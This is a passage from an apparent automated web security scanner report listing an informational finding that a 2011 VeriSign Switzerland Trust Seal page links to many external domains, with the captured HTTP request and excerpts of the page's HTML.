Chile</a>...[SNIP]... <li><a href='//www.verisignchina.com.cn/'> China</a>...[SNIP]... <li><a href='//www.verisign.com.hk/'> Hong Kong</a>...[SNIP]... <li><a href='//www.verisign.co.jp/'> Japan</a>...[SNIP]... <li><a href='//www.verisign.com/latinamerica/esp/'> Latin America</a>...[SNIP]... <li><a href='//www.verisign.com/mx/'> Mexico</a>...[SNIP]... <li><a href='//www.verisign.com/nl/'> Netherlands</a>...[SNIP]... <li><a href='//www.verisign.co.nz/'> New Zealand</a>...[SNIP]... <li><a href='//www.verisign.com.sg/'> Singapore</a>...[SNIP]... <li><a href='//www.verisign.com.tw/'> Taiwan</a>...[SNIP]... <li><a href='//www.verisign.com/'> United States</a>...[SNIP]... <li><a href='//www.verisign.co.uk/'> United Kingdom</a>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script> <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en">...[SNIP]... <param name="allowScriptAccess" value="always"> <embed src="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en" loop="false" menu="false" quality="best" wmode="transparent" swliveconnect="FALSE" name="s_s" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer" allowscriptaccess="always" align="" height="72" width="100"/> </object>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps'> Two-Factor Authentication</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps'> Digital IDs for Secure Email</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to'> Detect Fraud Online</a>...[SNIP]... <a href="/ssl/free-trial/index.html?tid=gnps-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" width="170" height="183" /> </a>...[SNIP]... <p class="small"><a rel="external" href="//verisign.com/partnersupport/worldwide/partnersupport.html"> Email support for login help.</a>...[SNIP]... </div> <a href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo" class="promo-link"> <img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg" alt="See all Featured SSL Partners" width="170" height="231" /> </a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport'> SSL Certificates Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport'> VeriSign Trust™ Seal Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport'> Code Signing Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport'> Digital IDs for Secure Email Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport'> Managed PKI Support</a>...[SNIP]... </div> <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo" class="promo-link"> <img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." width="170" height="183" /> </a>...[SNIP]... <li><a href='https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href='https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href='https://products.verisign.com/geocenter/reseller/logon.do'> VeriSign Partner Center Sign In</a>...[SNIP]... <li><a href="//www.symantec.com/de/ch/about/news/release/index.jsp"> News</a> <ul> <li><a href="//press.verisign.com/"> Press Release Archives</a>...[SNIP]... <li><a href="//www.verisign.com/press/awards/index.html"> Awards</a></li> <li><a href="//blogs.verisign.com/"> Blogs</a></li> <li><a href="//www.verisign.com/verisign-worldwide/index.html"> Worldwide Sites</a>...[SNIP]... <div id="emailPrint" class="emailPrint"> <a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"> <img style="margin-bottom: 0px;" src="/assets/shared/images/dev044079.gif" alt="Email">...[SNIP]... </script> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... <div id="playerTVAD"> <script src="http://player.ooyala.com/player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent"> </script> <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="ooyalaPlayer_44h86_g6tvkk69" width="488" height="335" codebase="https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"> <param name="wmode" value="transparent" />...[SNIP]... <param name="flashvars" value="embedType=directObjectTag&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c " /> <embed src="http://player.ooyala.com/player.swf?embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&version=2" bgcolor="#000000" width="488" height="335" name="ooyalaPlayer_44h86_g6tvkk69" align="middle" play="true" loop="false" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" flashvars="&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c" pluginspage="https://www.adobe.com/go/getflashplayer"> </embed>...[SNIP]... <p> VeriSign Authentication Services, now part of <a href="http://www.symantec.com"> Symantec Corp.</a>...[SNIP]... <p>If you are looking for Information on Domain Name Services, DDoS Protection, Managed DNS, or iDefense Security Intelligence Services, please visit <a href="http://www.verisigninc.com/en_CH/index.xhtml?loc=en_CH"> VeriSign Inc.</a>...[SNIP]... <p style="margin-bottom:20px;"><a href="http://www.symantec.com/business/theme.jsp?themeid=vs"> <img src="/assets/corp/images/about-verisign-772x127.jpg" alt="VeriSign's Identity and Authentication Security Business is Now Part of Symantec." title="VeriSign's Identity and Authentication Security ...[SNIP]... <li><a href="//www.symantec.com/about/news/release/article.jsp?prid=20100809_01"> Press Release</a>...[SNIP]... <li><a href="//www.symantec.com/content/en/us/enterprise/other_resources/b-verisign_faq.pdf"> FAQ</a>...[SNIP]... <li><a href="//investor.symantec.com/phoenix.zhtml?c=89422&p=irol-EventDetails&EventId=3096751"> Replay Webcast</a>...[SNIP]... <li><a href="//www.symantec.com/about/careers/index.jsp"> Symantec Careers</a>...[SNIP]... <li><a href="https://www4.symantec.com/events/controller?c=listing"> Symantec Events</a>...[SNIP]... <li><a href="//investor.symantec.com/phoenix.zhtml?c=89422&p=irol-irhomeNews"> Symantec Investor Relations</a>...[SNIP]... <li><a href="//www.youtube.com/verisignauth"> <img src="/assets/corp/images/youtube_logo.gif" alt="YouTube">...[SNIP]... <li style="padding-left:50px"><a href="//www.facebook.com/VeriSignAuthentication"> <img src="/assets/corp/images/facebook_logo.gif" alt="facebook">...[SNIP]... <li style="padding-left:50px"><a href="//twitter.com/verisign"> <img src="/assets/corp/images/twitter_logo.gif" alt="Twitter">...[SNIP]... <li style="padding-left:51px"><a href="//blogs.verisign.com/"> <img src="/assets/corp/images/blog_icon.gif" alt="Blogs">...[SNIP]... </div> <a href="//www.verisigninc.com/en_CH/index.xhtml?loc=en_CH" rel="external"> <img class="namingPromo" src="/assets/naming/images/naming_promo.gif" alt="Discover the Brand New Look of Verisign - Domain Name Services, Network Intelligence, and DNS Availability are now at verisign...[SNIP]... <li><a href='http://www.symantec.com/de/ch/about/news/release/index.jsp'> News</a></li><li><a href='//blogs.verisign.com/?tid=footer'> Blogs</a>...[SNIP]... <li><a href='//www.verisign.com/verisign-worldwide/index.html?tid=footer'> Worldwide Sites</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a>...[SNIP]... </a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html'> two-factor authentication</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html'> identity protection</a>...[SNIP]... </a> and <a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'> public key infrastructure</a> (<a href='//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html'> PKI</a>). Symantec products include <a href='http://ch.norton.com/'> Norton AntiVirus software</a>, <a href='http://smallbusiness.norton.com'> Norton Internet Security solutions for small business</a>, and <a href='http://www.pctools.com/de/'> PC Tools</a>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... <![endif]--><script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"> </script>...[SNIP]...
14.67. http://www.verisign.ch/trust-seal/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/trust-seal/index.html
Issue detail
The page was loaded from a URL containing a query string:http://www.verisign.ch/trust-seal/index.html?tid=gnps The response contains the following links to other domains:http://blogs.verisign.com/?tid=footer http://cdn.verisign.com/assets/shared/css/header.css http://cdn.verisign.com/assets/shared/js/curvycorners.js http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911 http://cdn.verisign.com/stellent/fragments/www_chatNow/zig.js http://ch.norton.com/ http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2 http://smallbusiness.norton.com/ http://verisign.com/partnersupport/worldwide/partnersupport.html http://view.atdmt.com/iaction/slctsl_2010Q2TrustSeal_1 http://www.addthis.com/bookmark.php?v=250 http://www.facebook.com/VeriSignAuthentication http://www.pctools.com/de/ http://www.symantec.com/ http://www.symantec.com/de/ch/about/news/release/index.jsp http://www.twitter.com/TrustSeal http://www.verisign.co.jp/ http://www.verisign.co.nz/ http://www.verisign.co.uk/ http://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps http://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to http://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html http://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps http://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps http://www.verisign.com.au/ http://www.verisign.com.br/ http://www.verisign.com.hk/ http://www.verisign.com.sg/ http://www.verisign.com.tw/ http://www.verisign.com/ http://www.verisign.com/ar/ http://www.verisign.com/ca/ http://www.verisign.com/cl/ http://www.verisign.com/latinamerica/esp/ http://www.verisign.com/mx/ http://www.verisign.com/nl/ http://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo http://www.verisign.com/stellent/fragments/vrsncssassets/vrsnStyles.css http://www.verisign.com/trust-seal/resources/case-studies/billtiger/index.html http://www.verisign.com/trust-seal/resources/case-studies/globalvillage/index.html http://www.verisign.com/trust-seal/resources/case-studies/myenergysolution/index.html http://www.verisign.com/trust-seal/resources/case-studies/trademark-company/index.html http://www.verisign.com/verisign-worldwide/index.html?tid=footer http://www.verisignchina.com.cn/ http://www.youtube.com/user/VeriSignAuth https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport https://products.verisign.com/geocenter/reseller/logon.do https://s7.addthis.com/js/250/addthis_widget.js?username=verisign https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH https://www.verisign.com/cgi-bin/go.cgi?a=w18550112675251018 https://www.verisign.com/js/mbox.js
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 50059 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>VeriSign Trust Seal - Perfec...[SNIP]... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="stylesheet" href="//www.verisign.com/stellent/fragments/vrsncssassets/vrsnStyles.css" type="text/css" /> <link rel="stylesheet" href="/assets/partners/css/styles.css" type="text/css" />...[SNIP]... </script><script type="text/JavaScript" src="https://www.verisign.com/js/mbox.js"> </script>...[SNIP]... <noscript><iframe src="//view.atdmt.com/iaction/slctsl_2010Q2TrustSeal_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"> </iframe>...[SNIP]... <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7]>...[SNIP]... <meta http-equiv="X-UA-Compatible" content="IE=7" /> <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" /> <script type="text/javascript">...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script> <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" /> <!--[if IE 6]>...[SNIP]... <a href="/?tid=header-logo" title="Now from Symantec - VeriSign Authentication Services"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png" /> </a>...[SNIP]... <li><a href='//www.verisign.com/ar/'> Argentina</a>...[SNIP]... <li><a href='//www.verisign.com.au/'> Australia</a>...[SNIP]... <li><a href='//www.verisign.com.br/'> Brazil</a>...[SNIP]... <li><a href='//www.verisign.com/ca/'> Canada</a>...[SNIP]... <li><a href='//www.verisign.com/cl/'> Chile</a>...[SNIP]... <li><a href='//www.verisignchina.com.cn/'> China</a>...[SNIP]... <li><a href='//www.verisign.com.hk/'> Hong Kong</a>...[SNIP]... <li><a href='//www.verisign.co.jp/'> Japan</a>...[SNIP]... <li><a href='//www.verisign.com/latinamerica/esp/'> Latin America</a>...[SNIP]... <li><a href='//www.verisign.com/mx/'> Mexico</a>...[SNIP]... <li><a href='//www.verisign.com/nl/'> Netherlands</a>...[SNIP]... <li><a href='//www.verisign.co.nz/'> New Zealand</a>...[SNIP]... <li><a href='//www.verisign.com.sg/'> Singapore</a>...[SNIP]... <li><a href='//www.verisign.com.tw/'> Taiwan</a>...[SNIP]... <li><a href='//www.verisign.com/'> United States</a>...[SNIP]... <li><a href='//www.verisign.co.uk/'> United Kingdom</a>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script> <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en">...[SNIP]... <param name="allowScriptAccess" value="always"> <embed src="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en" loop="false" menu="false" quality="best" wmode="transparent" swliveconnect="FALSE" name="s_s" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer" allowscriptaccess="always" align="" height="72" width="100"/> </object>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps'> Two-Factor Authentication</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps'> Digital IDs for Secure Email</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to'> Detect Fraud Online</a>...[SNIP]... <a href="/ssl/free-trial/index.html?tid=gnps-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" width="170" height="183" /> </a>...[SNIP]... <p class="small"><a rel="external" href="//verisign.com/partnersupport/worldwide/partnersupport.html"> Email support for login help.</a>...[SNIP]... </div> <a href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo" class="promo-link"> <img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg" alt="See all Featured SSL Partners" width="170" height="231" /> </a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport'> SSL Certificates Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport'> VeriSign Trust™ Seal Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport'> Code Signing Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport'> Digital IDs for Secure Email Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport'> Managed PKI Support</a>...[SNIP]... </div> <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo" class="promo-link"> <img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." width="170" height="183" /> </a>...[SNIP]... <li><a href='https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href='https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href='https://products.verisign.com/geocenter/reseller/logon.do'> VeriSign Partner Center Sign In</a>...[SNIP]... <div id="emailPrint" class="emailPrint"> <a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"> <img style="margin-bottom: 0px;" src="/assets/shared/images/dev044079.gif" alt="Email">...[SNIP]... </script> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... </p> <a href="http://www.verisign.com/trust-seal/resources/case-studies/myenergysolution/index.html"> Learn more</a>...[SNIP]... <img src="/assets/trust-seal/images/TrustSeal.png" alt="" /> <a class="ts_home_try headertext" href="https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH"> Free 60-day trial <span class="smalltext">...[SNIP]... </a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH"> Buy now</a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH"> Renew</a>...[SNIP]... </p> <a href="http://www.verisign.com/trust-seal/resources/case-studies/billtiger/index.html"> Learn more</a>...[SNIP]... <img src="/assets/trust-seal/images/TrustSeal.png" alt="" /> <a class="ts_home_try headertext" href="https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH"> Free 60-day trial <span class="smalltext">...[SNIP]... </a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH"> Buy now</a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH"> Renew</a>...[SNIP]... </p> <a href="http://www.verisign.com/trust-seal/resources/case-studies/globalvillage/index.html"> Learn more</a>...[SNIP]... <img src="/assets/trust-seal/images/TrustSeal.png" alt="" /> <a class="ts_home_try headertext" href="https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH"> Free 60-day trial <span class="smalltext">...[SNIP]... </a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH"> Buy now</a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH"> Renew</a>...[SNIP]... </p> <a href="http://www.verisign.com/trust-seal/resources/case-studies/trademark-company/index.html"> Learn more</a>...[SNIP]... <img src="/assets/trust-seal/images/TrustSeal.png" alt="" /> <a class="ts_home_try headertext" href="https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH"> Free 60-day trial <span class="smalltext">...[SNIP]... </a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH"> Buy now</a> <a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH"> Renew</a>...[SNIP]... <div id="vid_container"> <script src="http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent"> </script> <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="ooyalaPlayer_nezp_gh3eobtg" width="356" height="224" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"> <param name="movie" value="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" />...[SNIP]... <param name="wmode" value="transparent" /> <embed src="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" bgcolor="#000000" width="356" height="224" name="ooyalaPlayer_nezp_gh3eobtg" align="middle" play="true" loop="false" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" flashvars="&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG" pluginspage="http://www.adobe.com/go/getflashplayer"> </embed>...[SNIP]... <p style="width:210px;"> Contact Sales at 0800 56 29 24 or +41 26 429 7929 or <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w18550112675251018"> submit an inquiry online</a>...[SNIP]... </p> <script type="text/javascript" src="http://cdn.verisign.com/stellent/fragments/www_chatNow/zig.js"> </script>...[SNIP]... <div id="logos" class="floatl"> <a href="http://www.facebook.com/VeriSignAuthentication"> <img src="/assets/trust-seal/images/Facebook.png" alt="Facebook" style="margin-left:34px; margin-right:37px;"/></a><a href="http://www.twitter.com/TrustSeal"> <img src="/assets/trust-seal/images/Twitter.png" alt="Twitter" style="margin-right:37px;"/></a><a href="http://www.youtube.com/user/VeriSignAuth"> <img src="/assets/trust-seal/images/YouTube.png" alt="YouTube" />...[SNIP]... <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7]>...[SNIP]... <meta http-equiv="X-UA-Compatible" content="IE=7" /> <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" /> <script type="text/javascript">...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script> <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" /> <!--[if IE 6]>...[SNIP]... <li><a href='http://www.symantec.com/de/ch/about/news/release/index.jsp'> News</a></li><li><a href='//blogs.verisign.com/?tid=footer'> Blogs</a>...[SNIP]... <li><a href='//www.verisign.com/verisign-worldwide/index.html?tid=footer'> Worldwide Sites</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a>...[SNIP]... </a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html'> two-factor authentication</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html'> identity protection</a>...[SNIP]... </a> and <a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'> public key infrastructure</a> (<a href='//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html'> PKI</a>). Symantec products include <a href='http://ch.norton.com/'> Norton AntiVirus software</a>, <a href='http://smallbusiness.norton.com'> Norton Internet Security solutions for small business</a>, and <a href='http://www.pctools.com/de/'> PC Tools</a>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... <![endif]--><script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"> </script>...[SNIP]... <!-- Promo script--><script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js"> </script>...[SNIP]... <!-- Pre-load promo images to display correctly in promo--><script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js"> </script>...[SNIP]...
14.68. http://www.verisign.com/code-signing/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/code-signing/index.html
Issue detail
